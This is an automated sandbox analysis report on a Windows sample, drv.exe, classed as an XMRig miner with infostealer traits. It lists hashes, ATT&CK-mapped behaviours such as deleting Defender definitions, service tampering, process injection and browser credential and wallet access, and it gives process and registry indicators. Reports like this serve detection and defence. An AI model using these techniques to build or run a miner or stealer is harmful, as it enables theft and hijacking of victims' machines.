xmrig | 20166874773083c8543bf0ad5d29933cc8a549c99537ef5c843316704a603e2e

Analysis

max time kernel
150s
max time network
151s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241023-uk
resource tags

arch:x64arch:x86image:win10ltsc2021-20241023-uklocale:uk-uaos:windows10-ltsc 2021-x64systemwindows
submitted
20-11-2024 15:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

drv.exe
Size

9.2MB
MD5

7847274fd4b59430dbf28f58cc80fd4b
SHA1

c7301085fae2ebbc3bab0508f9ab008e11b39df7
SHA256

20166874773083c8543bf0ad5d29933cc8a549c99537ef5c843316704a603e2e
SHA512

9411130993f2fc3c0293414529c0c99a8023f097aabe962337534b92e35e7f2fcf123806cbdcc87c3792fbd48440437ca3be224824d80618b3fd37f0035f58de
SSDEEP

196608:C9K/OiZn75u+rC2x47P/4JkyCT2SwCvWSEjnXuwHo102YFCVQGk:C9KBerL4JLCuSnwHt2JE

Score

10^/10

xmrig collection credential_access defense_evasion discovery evasion execution miner persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs

Uses mpcmdrun utility to delete all AV definitions.

evasion

Impair Defenses

T1562

Command and Scripting Interpreter

T1059

pid	Process
1224	MpCmdRun.exe

Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 5676 created 988	5676	WerFault.exe	259

Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs

description	pid	Process	procid_target
PID 3016 created 636	3016	powershell.EXE	5
PID 4040 created 636	4040	powershell.EXE	5
PID 2420 created 988	2420	svchost.exe	259

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral2/memory/3796-536-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral2/memory/3796-537-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2208	powershell.exe
3016	powershell.EXE
4040	powershell.EXE
3644	powershell.exe
5072	powershell.exe
568	powershell.exe
408	powershell.exe
2136	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Drops file in Drivers directory 5 IoCs

description	ioc	Process
File created	C:\Windows\system32\drivers\etc\hosts	windows32.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	upinstall.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File created	C:\Windows\system32\drivers\etc\hosts	updater.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
1012	cmd.exe
3112	powershell.exe

Executes dropped EXE 6 IoCs

pid	Process
2136	Loader2.exe
3172	upinstall.exe
1076	upinstall.exe
2364	rar.exe
1912	updater.exe
4580	windows32.exe

Loads dropped DLL 32 IoCs

pid	Process
2136	Loader2.exe
2136	Loader2.exe
2136	Loader2.exe
2136	Loader2.exe
2136	Loader2.exe
2136	Loader2.exe
2136	Loader2.exe
2136	Loader2.exe
2136	Loader2.exe
2136	Loader2.exe
2136	Loader2.exe
2136	Loader2.exe
2136	Loader2.exe
2136	Loader2.exe
1076	upinstall.exe
1076	upinstall.exe
1076	upinstall.exe
1076	upinstall.exe
1076	upinstall.exe
1076	upinstall.exe
1076	upinstall.exe
1076	upinstall.exe
1076	upinstall.exe
1076	upinstall.exe
1076	upinstall.exe
1076	upinstall.exe
1076	upinstall.exe
1076	upinstall.exe
1076	upinstall.exe
1076	upinstall.exe
1076	upinstall.exe
1076	upinstall.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
65	pastebin.com
66	pastebin.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
36	ip-api.com

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
2828	powercfg.exe
240	powercfg.exe
5024	powercfg.exe
3680	powercfg.exe
3448	powercfg.exe
2624	powercfg.exe
2000	powercfg.exe
1364	powercfg.exe

Drops file in System32 directory 11 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	windows32.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\MRT.exe	updater.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
764	tasklist.exe
4156	tasklist.exe
3244	tasklist.exe
1896	tasklist.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 1912 set thread context of 4304	1912	updater.exe	215
PID 4580 set thread context of 2104	4580	windows32.exe	249
PID 4580 set thread context of 1952	4580	windows32.exe	250
PID 4580 set thread context of 3796	4580	windows32.exe	254
PID 3016 set thread context of 3332	3016	powershell.EXE	258
PID 4040 set thread context of 988	4040	powershell.EXE	259

UPX packed file 57 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x00280000000450be-155.dat	upx
behavioral2/memory/1076-159-0x00007FFAB6070000-0x00007FFAB6658000-memory.dmp	upx
behavioral2/files/0x00280000000450bc-164.dat	upx
behavioral2/memory/1076-166-0x00007FFACE310000-0x00007FFACE31F000-memory.dmp	upx
behavioral2/memory/1076-163-0x00007FFAC6790000-0x00007FFAC67B4000-memory.dmp	upx
behavioral2/files/0x002800000004508a-162.dat	upx
behavioral2/memory/1076-192-0x00007FFAC6760000-0x00007FFAC678D000-memory.dmp	upx
behavioral2/memory/1076-193-0x00007FFAC6740000-0x00007FFAC6759000-memory.dmp	upx
behavioral2/memory/1076-194-0x00007FFAC6710000-0x00007FFAC6733000-memory.dmp	upx
behavioral2/memory/1076-195-0x00007FFAB5EF0000-0x00007FFAB6063000-memory.dmp	upx
behavioral2/memory/1076-196-0x00007FFAC66F0000-0x00007FFAC6709000-memory.dmp	upx
behavioral2/memory/1076-198-0x00007FFAB8000000-0x00007FFAB802E000-memory.dmp	upx
behavioral2/memory/1076-197-0x00007FFAC7EA0000-0x00007FFAC7EAD000-memory.dmp	upx
behavioral2/memory/1076-200-0x00007FFAB5E30000-0x00007FFAB5EE8000-memory.dmp	upx
behavioral2/memory/1076-202-0x00007FFAB5AB0000-0x00007FFAB5E25000-memory.dmp	upx
behavioral2/memory/1076-203-0x00007FFAC6790000-0x00007FFAC67B4000-memory.dmp	upx
behavioral2/memory/1076-199-0x00007FFAB6070000-0x00007FFAB6658000-memory.dmp	upx
behavioral2/memory/1076-206-0x00007FFAC7410000-0x00007FFAC741D000-memory.dmp	upx
behavioral2/memory/1076-205-0x00007FFAC6760000-0x00007FFAC678D000-memory.dmp	upx
behavioral2/memory/1076-208-0x00007FFAB5710000-0x00007FFAB582C000-memory.dmp	upx
behavioral2/memory/1076-207-0x00007FFAC6740000-0x00007FFAC6759000-memory.dmp	upx
behavioral2/memory/1076-204-0x00007FFABDFA0000-0x00007FFABDFB4000-memory.dmp	upx
behavioral2/memory/1076-228-0x00007FFAC6710000-0x00007FFAC6733000-memory.dmp	upx
behavioral2/memory/1076-268-0x00007FFAB5EF0000-0x00007FFAB6063000-memory.dmp	upx
behavioral2/memory/1076-291-0x00007FFAC66F0000-0x00007FFAC6709000-memory.dmp	upx
behavioral2/memory/1076-323-0x00007FFAC7EA0000-0x00007FFAC7EAD000-memory.dmp	upx
behavioral2/memory/1076-346-0x00007FFAB8000000-0x00007FFAB802E000-memory.dmp	upx
behavioral2/memory/1076-347-0x00007FFAB5E30000-0x00007FFAB5EE8000-memory.dmp	upx
behavioral2/memory/1076-350-0x00007FFAB5AB0000-0x00007FFAB5E25000-memory.dmp	upx
behavioral2/memory/1076-351-0x00007FFABDFA0000-0x00007FFABDFB4000-memory.dmp	upx
behavioral2/memory/1076-377-0x00007FFAB5EF0000-0x00007FFAB6063000-memory.dmp	upx
behavioral2/memory/1076-386-0x00007FFAC7410000-0x00007FFAC741D000-memory.dmp	upx
behavioral2/memory/1076-385-0x00007FFAB5710000-0x00007FFAB582C000-memory.dmp	upx
behavioral2/memory/1076-371-0x00007FFAB6070000-0x00007FFAB6658000-memory.dmp	upx
behavioral2/memory/1076-372-0x00007FFAC6790000-0x00007FFAC67B4000-memory.dmp	upx
behavioral2/memory/1076-390-0x00007FFAB6070000-0x00007FFAB6658000-memory.dmp	upx
behavioral2/memory/1076-405-0x00007FFAB5AB0000-0x00007FFAB5E25000-memory.dmp	upx
behavioral2/memory/1076-419-0x00007FFAB5710000-0x00007FFAB582C000-memory.dmp	upx
behavioral2/memory/1076-418-0x00007FFAC7410000-0x00007FFAC741D000-memory.dmp	upx
behavioral2/memory/1076-417-0x00007FFABDFA0000-0x00007FFABDFB4000-memory.dmp	upx
behavioral2/memory/1076-415-0x00007FFAB5E30000-0x00007FFAB5EE8000-memory.dmp	upx
behavioral2/memory/1076-414-0x00007FFAB8000000-0x00007FFAB802E000-memory.dmp	upx
behavioral2/memory/1076-413-0x00007FFAC7EA0000-0x00007FFAC7EAD000-memory.dmp	upx
behavioral2/memory/1076-412-0x00007FFAC66F0000-0x00007FFAC6709000-memory.dmp	upx
behavioral2/memory/1076-411-0x00007FFAB5EF0000-0x00007FFAB6063000-memory.dmp	upx
behavioral2/memory/1076-410-0x00007FFAC6710000-0x00007FFAC6733000-memory.dmp	upx
behavioral2/memory/1076-409-0x00007FFAC6740000-0x00007FFAC6759000-memory.dmp	upx
behavioral2/memory/1076-408-0x00007FFAC6760000-0x00007FFAC678D000-memory.dmp	upx
behavioral2/memory/1076-407-0x00007FFACE310000-0x00007FFACE31F000-memory.dmp	upx
behavioral2/memory/1076-406-0x00007FFAC6790000-0x00007FFAC67B4000-memory.dmp	upx
behavioral2/memory/3796-531-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/3796-536-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/3796-537-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/3796-535-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/3796-534-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/3796-533-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/3796-532-0x0000000140000000-0x0000000140835000-memory.dmp	upx

Drops file in Windows directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\CBS\CBS.log	TiWorker.exe
File opened for modification	C:\Windows\CbsTemp	TiWorker.exe

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2296	sc.exe
4436	sc.exe
5056	sc.exe
3320	sc.exe
4568	sc.exe
3004	sc.exe
4300	sc.exe
3580	sc.exe
2944	sc.exe
4736	sc.exe
4780	sc.exe
1728	sc.exe
3316	sc.exe
2128	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4880	cmd.exe
1388	netsh.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1720	WMIC.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
3532	systeminfo.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={96D533AC-157F-4C60-9416-4DFFA36B90DD}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	dialer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3644	powershell.exe
3644	powershell.exe
3644	powershell.exe
568	powershell.exe
568	powershell.exe
3596	WMIC.exe
3596	WMIC.exe
3596	WMIC.exe
3596	WMIC.exe
3112	powershell.exe
3112	powershell.exe
1512	powershell.exe
1512	powershell.exe
568	powershell.exe
568	powershell.exe
3112	powershell.exe
1512	powershell.exe
5072	powershell.exe
5072	powershell.exe
5072	powershell.exe
4244	powershell.exe
4244	powershell.exe
4244	powershell.exe
2356	WMIC.exe
2356	WMIC.exe
2356	WMIC.exe
2356	WMIC.exe
528	WMIC.exe
528	WMIC.exe
528	WMIC.exe
528	WMIC.exe
3364	WMIC.exe
3364	WMIC.exe
3364	WMIC.exe
3364	WMIC.exe
2208	powershell.exe
2208	powershell.exe
1720	WMIC.exe
1720	WMIC.exe
1720	WMIC.exe
1720	WMIC.exe
784	powershell.exe
784	powershell.exe
1912	updater.exe
408	powershell.exe
408	powershell.exe
1912	updater.exe
1912	updater.exe
1912	updater.exe
1912	updater.exe
1912	updater.exe
1912	updater.exe
1912	updater.exe
1912	updater.exe
1912	updater.exe
1912	updater.exe
1912	updater.exe
1912	updater.exe
1912	updater.exe
1912	updater.exe
1912	updater.exe
4580	windows32.exe
3016	powershell.EXE
2136	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3644	powershell.exe
Token: SeDebugPrivilege	764	tasklist.exe
Token: SeDebugPrivilege	4156	tasklist.exe
Token: SeDebugPrivilege	568	powershell.exe
Token: SeIncreaseQuotaPrivilege	3596	WMIC.exe
Token: SeSecurityPrivilege	3596	WMIC.exe
Token: SeTakeOwnershipPrivilege	3596	WMIC.exe
Token: SeLoadDriverPrivilege	3596	WMIC.exe
Token: SeSystemProfilePrivilege	3596	WMIC.exe
Token: SeSystemtimePrivilege	3596	WMIC.exe
Token: SeProfSingleProcessPrivilege	3596	WMIC.exe
Token: SeIncBasePriorityPrivilege	3596	WMIC.exe
Token: SeCreatePagefilePrivilege	3596	WMIC.exe
Token: SeBackupPrivilege	3596	WMIC.exe
Token: SeRestorePrivilege	3596	WMIC.exe
Token: SeShutdownPrivilege	3596	WMIC.exe
Token: SeDebugPrivilege	3596	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3596	WMIC.exe
Token: SeRemoteShutdownPrivilege	3596	WMIC.exe
Token: SeUndockPrivilege	3596	WMIC.exe
Token: SeManageVolumePrivilege	3596	WMIC.exe
Token: 33	3596	WMIC.exe
Token: 34	3596	WMIC.exe
Token: 35	3596	WMIC.exe
Token: 36	3596	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3644	powershell.exe
Token: SeSecurityPrivilege	3644	powershell.exe
Token: SeTakeOwnershipPrivilege	3644	powershell.exe
Token: SeLoadDriverPrivilege	3644	powershell.exe
Token: SeSystemProfilePrivilege	3644	powershell.exe
Token: SeSystemtimePrivilege	3644	powershell.exe
Token: SeProfSingleProcessPrivilege	3644	powershell.exe
Token: SeIncBasePriorityPrivilege	3644	powershell.exe
Token: SeCreatePagefilePrivilege	3644	powershell.exe
Token: SeBackupPrivilege	3644	powershell.exe
Token: SeRestorePrivilege	3644	powershell.exe
Token: SeShutdownPrivilege	3644	powershell.exe
Token: SeDebugPrivilege	3644	powershell.exe
Token: SeSystemEnvironmentPrivilege	3644	powershell.exe
Token: SeRemoteShutdownPrivilege	3644	powershell.exe
Token: SeUndockPrivilege	3644	powershell.exe
Token: SeManageVolumePrivilege	3644	powershell.exe
Token: 33	3644	powershell.exe
Token: 34	3644	powershell.exe
Token: 35	3644	powershell.exe
Token: 36	3644	powershell.exe
Token: SeDebugPrivilege	3244	tasklist.exe
Token: SeDebugPrivilege	3112	powershell.exe
Token: SeIncreaseQuotaPrivilege	3596	WMIC.exe
Token: SeSecurityPrivilege	3596	WMIC.exe
Token: SeTakeOwnershipPrivilege	3596	WMIC.exe
Token: SeLoadDriverPrivilege	3596	WMIC.exe
Token: SeSystemProfilePrivilege	3596	WMIC.exe
Token: SeSystemtimePrivilege	3596	WMIC.exe
Token: SeProfSingleProcessPrivilege	3596	WMIC.exe
Token: SeIncBasePriorityPrivilege	3596	WMIC.exe
Token: SeCreatePagefilePrivilege	3596	WMIC.exe
Token: SeBackupPrivilege	3596	WMIC.exe
Token: SeRestorePrivilege	3596	WMIC.exe
Token: SeShutdownPrivilege	3596	WMIC.exe
Token: SeDebugPrivilege	3596	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3596	WMIC.exe
Token: SeRemoteShutdownPrivilege	3596	WMIC.exe
Token: SeUndockPrivilege	3596	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2652 wrote to memory of 2136	2652	drv.exe	82
PID 2652 wrote to memory of 2136	2652	drv.exe	82
PID 2136 wrote to memory of 2628	2136	Loader2.exe	87
PID 2136 wrote to memory of 2628	2136	Loader2.exe	87
PID 2628 wrote to memory of 3172	2628	cmd.exe	89
PID 2628 wrote to memory of 3172	2628	cmd.exe	89
PID 3172 wrote to memory of 1076	3172	upinstall.exe	90
PID 3172 wrote to memory of 1076	3172	upinstall.exe	90
PID 1076 wrote to memory of 3848	1076	upinstall.exe	92
PID 1076 wrote to memory of 3848	1076	upinstall.exe	92
PID 1076 wrote to memory of 3268	1076	upinstall.exe	93
PID 1076 wrote to memory of 3268	1076	upinstall.exe	93
PID 3268 wrote to memory of 3644	3268	cmd.exe	96
PID 3268 wrote to memory of 3644	3268	cmd.exe	96
PID 1076 wrote to memory of 980	1076	upinstall.exe	97
PID 1076 wrote to memory of 980	1076	upinstall.exe	97
PID 1076 wrote to memory of 988	1076	upinstall.exe	98
PID 1076 wrote to memory of 988	1076	upinstall.exe	98
PID 980 wrote to memory of 764	980	cmd.exe	101
PID 980 wrote to memory of 764	980	cmd.exe	101
